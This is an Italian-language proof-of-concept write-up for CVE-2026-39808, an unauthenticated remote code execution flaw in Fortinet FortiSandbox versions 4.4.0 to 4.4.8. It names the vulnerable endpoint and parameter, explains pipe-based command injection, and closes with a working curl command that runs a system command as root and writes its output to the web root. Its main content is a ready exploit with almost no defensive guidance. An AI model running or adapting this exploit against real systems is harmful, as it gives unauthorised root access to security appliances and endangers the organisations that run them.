
PoC per RCE non autenticata in FortiSandbox tramite CVE-2026-39808
A novembre 2025, è stata scoperta una vulnerabilità critica in FortiSandbox di Fortinet che consentiva a un attaccante non autenticato di eseguire comandi nel sistema operativo sottostante come root. La vulnerabilità è stata corretta e infine resa pubblica ad aprile 2026.
Questa vulnerabilità interessa le versioni di FortiSandbox dalla 4.4.0 alla 4.4.8.
Leggi l'advisory completo qui.
La vulnerabilità interessa l'endpoint /fortisandbox/job-detail/tracer-behavior. I comandi del sistema operativo possono essere iniettati usando il simbolo pipe (|) nel parametro GET jid.
Nell'esempio precedente, l'output è stato reindirizzato a un file nella root web, così da poter essere recuperato successivamente.
Un semplice comando curl è sufficiente per ottenere RCE come root senza alcuna autenticazione precedente:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"